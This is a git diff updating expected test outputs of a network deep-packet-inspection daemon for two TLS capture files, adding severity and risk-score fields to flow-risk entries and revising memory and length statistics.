 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 180 chars
 ~~ json string max len.......: 2438 chars
diff --git a/test/results/tls_cipher_lens.pcap.out b/test/results/tls_cipher_lens.pcap.out
index fcaab824c..4de1dc25c 100644
--- a/test/results/tls_cipher_lens.pcap.out
+++ b/test/results/tls_cipher_lens.pcap.out
@@ -1,19 +1,19 @@
 00447{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mDAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAASAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mGAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhgD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mFAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhQD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mEAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="}
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mHAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAAAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -28,10 +28,10 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4610014 bytes
-~~ total memory freed........: 4610014 bytes
-~~ total allocations/frees...: 99575/99575
+~~ total memory allocated....: 4693655 bytes
+~~ total memory freed........: 4693655 bytes
+~~ total allocations/frees...: 101165/101165
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
-~~ json string max len.......: 863 chars
-~~ json string avg len.......: 585 chars
+~~ json string max len.......: 968 chars
+~~ json string avg len.......: 638 chars
diff --git a/test/results/tls_esni_sni_both.pcap.out b/test/results/tls_esni_sni_both.pcap.out
index a1a7662f7..f916d1e00 100644
--- a/test/results/tls_esni_sni_both.pcap.out
+++ b/test/results/tls_esni_sni_both.pcap.out
@@ -3,16 +3,16 @@
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595697574192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1595697574192,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjMAbsVnUj1AAAAALAC\/\/+ITAAAAgQFtAEDAwYBAQgKRX5W8wAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595697574222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1595697574222,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72MxjNlEZFZ1I9oAS\/\/+oqwAAAgQFeAEBBAIBAwMK"}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595697574222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1595697574222,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjMAbsVnUj2YzZRGlAQEADZRAAA"}
-00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","21":"TLS Suspicious ESNI Usage"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}}
-01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","21":"TLS Suspicious ESNI Usage"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}}
+01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}}
+01197{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697597731,"flow_last_seen":1595697597731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1595697597731,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1595697597731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1595697597731,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjaAbvycO9jAAAAALAC\/\/+plAAAAgQFtAEDAwYBAQgKRX6yWgAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1595697597760,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72Npkmiax8nDvZIAS\/\/9OXwAAAgQFeAEBBAIBAwMK"}
